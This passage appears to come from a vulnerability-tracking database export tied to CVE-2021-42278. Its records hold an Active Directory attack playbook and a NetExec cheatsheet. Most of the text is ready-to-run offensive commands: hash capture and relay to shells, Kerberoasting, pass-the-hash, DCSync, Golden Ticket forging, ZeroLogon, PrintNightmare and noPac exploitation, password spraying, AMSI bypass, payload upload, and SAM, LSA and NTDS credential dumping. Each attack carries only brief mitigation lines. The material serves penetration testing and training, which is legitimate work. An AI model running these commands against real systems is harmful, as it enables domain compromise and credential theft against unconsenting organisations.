Figure 1: enum4linux-ng output showing domain users and groups]\n\nCaption: enum4linux-ng successful enumeration of domain users from null session\nMitigation\nDisable anonymous LDAP binds\n\nRestrict null session access via HKLM\\System\\CurrentControlSet\\Control\\LSA\\RestrictAnonymous\n\nEnable SMB signing\n\nAttack 2: LLMNR/NBT-NS Poisoning (Responder)\nDescription\nWhen a host cannot resolve a name via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS). Responder listens for these requests and responds, capturing NTLMv2 hashes from the requesting machine.\n\nTools Used\nResponder (Kali Linux)\n\nInveigh (Windows)\n\nCommands\nStart Responder in Analyze Mode (safe enumeration):\n\nbash\nsudo responder -I eth0 -A\nStart Responder in Poisoning Mode:\n\nbash\nsudo responder -I eth0 -wFvP\nConfigure Responder for SMB Relay (disable SMB/HTTP):\nEdit /usr/share/responder/Responder.conf:\n\nini\n[Responder Core]\n; Servers to start\nSMB = Off\nHTTP = Off\nSQL = On\nFTP = On\nbash\nsudo responder -I eth0 -wFvP\nWindows Alternative (Inveigh):\n\npowershell\n# Load and run Inveigh\nImport-Module .\\Inveigh.ps1\nInvoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 2: Responder capturing NTLMv2 hash from a compromised host]\n\nCaption: Responder captures NTLMv2 hash for user 'jsmith' from host 192.168.1.100\nCracking Captured Hashes\nbash\n# Save hash to file (NTLMv2 format)\nhashcat -m 5600 responder_hash.txt /usr/share/wordlists/rockyou.txt -O\nMitigation\nDisable LLMNR and NBT-NS via Group Policy\n\nEnable Network Access Control\n\nRequire SMB signing\n\nAttack 3: SMB Relay Attack\nDescription\nInstead of cracking captured hashes, you can relay them directly to another machine to authenticate. 
If the target machine has SMB signing disabled, you can execute commands or dump SAM hashes.\n\nPrerequisites\nTarget must have SMB signing disabled\n\nCaptured hash must be from a user with admin privileges on target\n\nCommands\nCheck for SMB Signing Disabled:\n\nbash\nnmap --script=smb2-security-mode.nse -p445 192.168.1.0/24\nStart NTLM Relay (single target):\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support\nRelay to Multiple Targets:\n\nbash\nntlmrelayx.py -tf targets.txt -smb2support\nExecute Command via Relay:\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support -c \"whoami\"\nGenerate Interactive Shell:\n\nbash\n# Start relay with reverse shell\nntlmrelayx.py -t 192.168.1.20 -smb2support -i\n# Then connect to the interactive shell\nnc 127.0.0.1 11000\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 3: ntlmrelayx.py successfully relaying to target and dumping SAM]\n\nCaption: Successful SMB relay attack dumping local SAM hashes from target 192.168.1.20\nMitigation\nEnable SMB signing on all systems\n\nDisable NTLM authentication where possible\n\nImplement SMB over QUIC for modern environments\n\nAttack 4: Kerberoasting\nDescription\nAny authenticated domain user can request a Kerberos Ticket Granting Service (TGS) ticket for any service account with a Service Principal Name (SPN). 
The TGS is encrypted with the service account's NTLM hash, allowing offline cracking.\n\nTools Used\nGetUserSPNs.py (Impacket)\n\nRubeus.exe (Windows)\n\nPowerView\n\nCommands\nLinux - Extract all SPNs:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request\nSave Hashes for Cracking:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request -outputfile kerberoast_hashes.txt\nCrack with Hashcat:\n\nbash\n# Mode 13100 = Kerberos 5 TGS-REP (etype 23)\nhashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Request all SPNs\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Request specific SPN\nRubeus.exe kerberoast /spn:\"MSSQLSvc/sql.corp.local\" /nowrap\nUsing PowerView:\n\npowershell\n# Find all SPNs\nGet-DomainUser -SPN | Select-Object samAccountName, ServicePrincipalName\n\n# Request TGS\nGet-DomainUser -SPN | Request-SPNTicket\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 4: GetUserSPNs.py output with hash for svc_sql account]\n\nCaption: Kerberoasting attack successfully extracts TGS ticket for svc_sql account\nMitigation\nUse long, complex passwords (25+ characters) for service accounts\n\nUse Group Managed Service Accounts (gMSA)\n\nMonitor Event ID 4769 for unusual TGS requests\n\nAttack 5: AS-REP Roasting\nDescription\nAccounts with \"Do not require Kerberos preauthentication\" enabled will respond to authentication requests with an AS-REP message encrypted with the user's password hash. 
This attack requires NO valid credentials.\n\nCommands\nFind and Roast All Vulnerable Users:\n\nbash\npython3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt\nTarget a Specific User:\n\nbash\npython3 GetNPUsers.py corp.local/jsmith -request -format hashcat\nCrack AS-REP Hashes:\n\nbash\n# Mode 18200 = Kerberos 5 AS-REP (etype 23)\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Find users with preauth disabled\nRubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 5: GetNPUsers.py successfully retrieving AS-REP hash for user 'svc_backup']\n\nCaption: AS-REP Roasting attack retrieves crackable hash without any authentication\nMitigation\nAudit accounts with preauthentication disabled\n\npowershell\nGet-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth\nEnable preauthentication on all accounts\n\nMonitor Event ID 4768 with error code 0x0\n\nAttack 6: Password Spraying\nDescription\nInstead of brute-forcing one account, password spraying attempts one common password against many accounts. This stays under the lockout threshold.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.10 -u users.txt -p 'Winter2025!' 
--continue-on-success\nUsing DomainPasswordSpray.ps1:\n\npowershell\nImport-Module .\\DomainPasswordSpray.ps1\nInvoke-DomainPasswordSpray -Password Winter2025!\nUsing Kerbrute:\n\nbash\n# Password spray using Kerberos\nkerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt \"Winter2025!\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 6: CrackMapExec successful password spray finding valid credentials]\n\nCaption: Password spray discovers valid credentials for multiple users\nMitigation\nImplement Azure AD Password Protection\n\nUse Fine-Grained Password Policies for privileged accounts\n\nEnable SIEM alerting for distributed failed authentication\n\nAttack 7: Pass-the-Hash (PtH)\nDescription\nWindows NTLM authentication allows authentication using only the hash of a password. Once an NTLM hash is obtained, an attacker can authenticate without ever knowing the plaintext password.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.20 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c\nUsing Impacket:\n\nbash\n# Using psexec\npython3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using wmiexec\npython3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using smbexec\npython3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\nWindows - Using Mimikatz:\n\npowershell\n# Pass the hash\nsekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 7: psexec.py successful pass-the-hash attack gaining shell]\n\nCaption: Pass-the-Hash attack successfully creates remote shell using only NTLM hash\nMitigation\nEnable Protected Users group for privileged accounts\n\nImplement Credential Guard (VBS)\n\nEnforce tiered administration 
models\n\nDisable NTLM where possible\n\nAttack 8: DCSync Attack\nDescription\nIf an account has \"Replicating Directory Changes\" permissions, it can impersonate a Domain Controller and request replication of AD data, including password hashes for ANY account, including krbtgt and Domain Admins.\n\nCommands\nDump Specific User Hash:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt\nDump All NTLM Hashes:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-ntlm\nDump Entire NTDS.dit:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc\nUsing Mimikatz (if on DC or with appropriate rights):\n\npowershell\nlsadump::dcsync /user:krbtgt\nlsadump::dcsync /domain:corp.local /user:administrator\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 8: secretsdump.py successful DCSync extracting krbtgt hash]\n\nCaption: DCSync attack extracts krbtgt hash, enabling Golden Ticket creation\nMitigation\nRestrict replication rights to only Domain Controllers\n\nAudit DCSync rights using BloodHound\n\npowershell\n(Get-Acl \"AD:\\DC=corp,DC=local\").Access | Where-Object { $_.ActiveDirectoryRights -match \"DS-Replication\" }\nMonitor Event ID 4662 for replication access\n\nAttack 9: ACL Abuse & BloodHound\nDescription\nActive Directory objects have Access Control Lists that can be misconfigured. 
A helpdesk account might have GenericAll on a Domain Admin account, or WriteDACL allowing modification of permissions.\n\nCommands\nCollect Data with BloodHound.py:\n\nbash\nbloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip\nCollect Using SharpHound (Windows):\n\npowershell\n# Ingest all data\nSharpHound.exe -c All\n\n# With specific domain controller\nSharpHound.exe -c All -d corp.local -dc dc.corp.local\nAbuse GenericWrite to Add to Group:\n\npowershell\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members \"jsmith\"\nAbuse WriteDACL to Grant DCSync Rights:\n\npowershell\nAdd-DomainObjectAcl -TargetIdentity \"DC=corp,DC=local\" -PrincipalIdentity jsmith -Rights DCSync\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 9: BloodHound GUI displaying attack path from user to Domain Admin]\n\nCaption: BloodHound visualization shows shortest path to Domain Admin via ACL misconfigurations\nMitigation\nRun BloodHound defensively on a schedule\n\nAudit all non-default ACL entries\n\nImplement tiered administration\n\nUse tools like ADACLScanner for bulk reporting\n\nAttack 10: Unconstrained Delegation Attacks\nDescription\nWhen a computer has unconstrained delegation enabled, it stores TGTs of any user that authenticates to it. 
By coercing a Domain Controller to authenticate (via PrinterBug or PetitPotam), the attacker can capture a Domain Admin TGT.\n\nCommands\nFind Systems with Unconstrained Delegation:\n\npowershell\n# Using PowerView\nGet-DomainComputer -Unconstrained | Select-Object samAccountName, dnshostname\n\n# Using AD PowerShell\nGet-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName\nMonitor for TGTs with Rubeus:\n\npowershell\nRubeus.exe monitor /interval:5 /nowrap\nCoerce Authentication with PrinterBug:\n\nbash\npython3 printerbug.py corp.local/username:password@TARGET_DC_IP VICTIM_IP\nExtract TGT and Pass-the-Ticket:\n\npowershell\nRubeus.exe ptt /ticket:\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 10: Rubeus monitoring captures Domain Admin TGT after coercion]\n\nCaption: Unconstrained delegation attack captures DC TGT, granting Domain Admin access\nMitigation\nAvoid unconstrained delegation entirely\n\nUse constrained delegation or RBCD with explicit restrictions\n\nAudit for TrustedForDelegation accounts\n\nAttack 11: ADCS Attacks (Certified Pre-Owned)\nDescription\nActive Directory Certificate Services (AD CS) misconfigurations allow attackers to request certificates for arbitrary users, including Domain Admins, leading to complete domain compromise.\n\nCommands\nEnumerate AD CS with Certipy:\n\nbash\n# Find vulnerable templates\ncertipy-ad find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10\n\n# Save output\ncertipy-ad find -u jsmith@corp.local -p Password123 -vulnerable -output adcs_enum\nRequest Certificate via Vulnerable Template:\n\nbash\ncertipy-ad req -u jsmith@corp.local -p Password123 -ca CORP-DC-CA -template User -dc-ip 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 11: Certipy find output showing vulnerable certificate templates]\n\nCaption: Certipy enumerates AD CS and identifies ESC1 vulnerability (Client Authentication template)\nMitigation\nDisable vulnerable 
certificate templates\n\nEnforce manager approval for sensitive templates\n\nImplement certificate auditing\n\nAttack 12: PetitPotam & NTLM Relay to ADCS\nDescription\nPetitPotam coerces a Domain Controller to authenticate to an attacker-controlled server. Combined with NTLM relay to ADCS HTTP endpoints, this yields a certificate for the DC, allowing DCSync and full domain compromise.\n\nPrerequisites\nAD CS server with Web Enrollment enabled\n\nDomain Controller unpatched for CVE-2021-36942\n\nCommands\nSetup NTLM Relay to ADCS:\n\nbash\npython3 ntlmrelayx.py -debug -smb2support --target http://adcs.corp.local/certsrv/certfnsh.asp --adcs --template DomainController\nRun PetitPotam to Coerce DC:\n\nbash\npython3 PetitPotam.py ATTACKER_IP DC_IP\nExtract Certificate (Linux):\n\nbash\n# Save base64 certificate\ncat base64 | base64 -d > certificate.pfx\n\n# Request TGT with PKINIT\npython3 gettgtpkinit.py corp.local/DC01$ -cert-pfx certificate.pfx out.ccache\n\n# Set cache\nexport KRB5CCNAME=out.ccache\n\n# DCSync using TGT\npython3 secretsdump.py -k -no-pass corp.local/DC01\\$@DC01.corp.local\nWindows Alternative using Rubeus:\n\npowershell\n# Request TGT from certificate\nRubeus.exe asktgt /user:DC01$ /certificate: /ptt\n\n# DCSync\nmimikatz \"lsadump::dcsync /user:krbtgt\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 12: PetitPotam coercing DC to authenticate to ntlmrelayx]\n\nCaption: PetitPotam forces Domain Controller authentication, captured by ntlmrelayx\nMitigation\nApply Microsoft patch KB5005413\n\nDisable NTLM on AD CS servers\n\nEnable EPA (Extended Protection for Authentication)\n\nAttack 13: Kerberos Golden/Silver Tickets\nDescription\nWith the krbtgt hash, attackers create Golden Tickets - valid TGTs for ANY user (including non-existent ones). 
Silver Tickets target specific services using service account hashes.\n\nGolden Ticket Commands\nUsing Mimikatz:\n\npowershell\n# Create Golden Ticket for Domain Admin\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /id:500 /ptt\n\n# Create Golden Ticket with custom expiry\nkerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /startoffset:0 /endin:600 /renewmax:10080 /ptt\nUsing Impacket (Linux):\n\nbash\npython3 ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nSilver Ticket Commands\nCreate Silver Ticket for CIFS Service:\n\npowershell\nkerberos::golden /user:EvilUser /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /target:DC01.corp.local /service:cifs /rc4:MACHINE_ACCOUNT_HASH /ptt\nAccess DC with Silver Ticket:\n\nbash\n# Using the ticket to access CIFS\npython3 psexec.py -k corp.local/EvilUser@DC01.corp.local\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 13: Mimikatz Golden Ticket creation and successful psexec to DC]\n\nCaption: Golden Ticket allows complete Domain Controller access without valid credentials\nMitigation\nRotate krbtgt password twice (after DC compromise)\n\nEnable KRBTGT password rotation automation\n\nMonitor for anomalous TGT requests (Event ID 4768)\n\nLimit lifetime of Kerberos tickets\n\nAttack 14: ZeroLogon (CVE-2020-1472)\nDescription\nA critical vulnerability in Netlogon protocol (MS-NRPC) allows attackers to set the machine account password of a Domain Controller to an empty string, then DCSync as that DC.\n\nCommands\nCheck if Vulnerable:\n\nbash\npython3 zerologon_tester.py DC01 192.168.1.10\nExploit to Change DC Password:\n\nbash\npython3 cve-2020-1472-exploit.py DC01 192.168.1.10\nAfter Exploit - DCSync:\n\nbash\npython3 secretsdump.py corp.local/DC01\\$@192.168.1.10 -no-pass\nRestore Original Password 
(Critical!):\n\nbash\n# Extract original password hash from DCSync results\npython3 restorepassword.py DC01@DC01.corp.local -target-ip 192.168.1.10 -hexpass ORIGINAL_HASH\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 14: ZeroLogon exploit successfully changing DC machine account password]\n\nCaption: ZeroLogon vulnerability exploited, enabling DCSync with empty password\nMitigation\nApply Windows updates from August 2020\n\nEnable enforced Netlogon signing\n\nMonitor for Event ID 5829, 5830, 5831\n\nAttack 15: PrintNightmare (CVE-2021-1675)\nDescription\nThe Print Spooler service on Windows allows remote attackers to execute arbitrary code with SYSTEM privileges. This affects Domain Controllers and member servers.\n\nCommands\nRemote DLL Injection Exploit:\n\nbash\n# Using CVE-2021-1675.py\npython3 CVE-2021-1675.py corp.local/username:password@TARGET_IP /path/to/malicious.dll\nUsing Impacket Version:\n\nbash\npython3 printerbug.py -dll /path/to/malicious.dll corp.local/username:password@TARGET_IP\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 15: PrintNightmare exploitation yielding SYSTEM shell on DC]\n\nCaption: PrintNightmare vulnerability exploited to gain SYSTEM privileges on Domain Controller\nMitigation\nDisable Print Spooler service on Domain Controllers\n\nApply Microsoft security patches\n\nImplement print service hardening\n\nAttack 16: noPac (CVE-2021-42278/CVE-2021-42287)\nDescription\nA chain of two vulnerabilities affecting all Windows Domain Controllers. 
It allows a standard domain user to impersonate a Domain Controller and request a TGT for Domain Admin.\n\nCommands\nUsing noPac.py:\n\nbash\n# Request Service Ticket to domain controller\npython3 noPac.py corp.local/jsmith:Password123 -dc-ip 192.168.1.10 -dc-host DC01.corp.local -shell --impersonate Administrator\n\n# Or with hash\npython3 noPac.py corp.local/jsmith -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -dc-ip 192.168.1.10\nManual Exploitation with Rubeus:\n\npowershell\n# Add machine account\nAdd-MachineAccount -MachineAccount EvilPC -Password Password123\n\n# Clear SPNs\nSet-ADComputer EvilPC -ServicePrincipalNames @{}\n\n# Change hostname to DC\nSet-ADComputer EvilPC -DnsHostname DC01.corp.local\n\n# Request TGT\nRubeus.exe asktgt /user:EvilPC$ /password:Password123 /domain:corp.local /dc:DC01.corp.local /nowrap\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 16: noPac.py successfully obtaining DA shell from standard user]\n\nCaption: noPac attack chain escalates from low-privilege user to Domain Admin shell\nMitigation\nApply Microsoft patches (October 2021 and later)\n\nMonitor for computer account name changes (Event ID 4742)\n\nImplement PAC validation\n\nTools Reference Summary\nTool\tPurpose\tSource\nResponder\tLLMNR/NBT-NS poisoning\tKali default\nImpacket Suite\tVarious AD attacks\tpipx install impacket\nBloodHound\tAttack path mapping\tKali default\nRubeus\tKerberos abuse\tGitHub\nMimikatz\tCredential extraction\tGitHub\nCrackMapExec (netexec)\tSwiss Army knife for AD\tKali default\nCertipy\tAD CS enumeration/abuse\tsudo apt install certipy-ad\nKerbrute\tUser enumeration\tKali default\n", "creation_timestamp": "2026-05-31T23:19:52.000000Z"}, {"uuid": "76699f7b-91b5-427c-af5e-6aa120f08bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": 
"Telegram/fO-UeyZKTtHCwNeV96AKSNSdqyEhxnaa_KQJZWWdPcKrF9o", "content": "", "creation_timestamp": "2023-03-14T17:04:16.000000Z"}, {"uuid": "c1f2577e-d80b-424c-9e97-0e904f1d4a8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single 
password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, 
signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ 
--regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 
192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u 
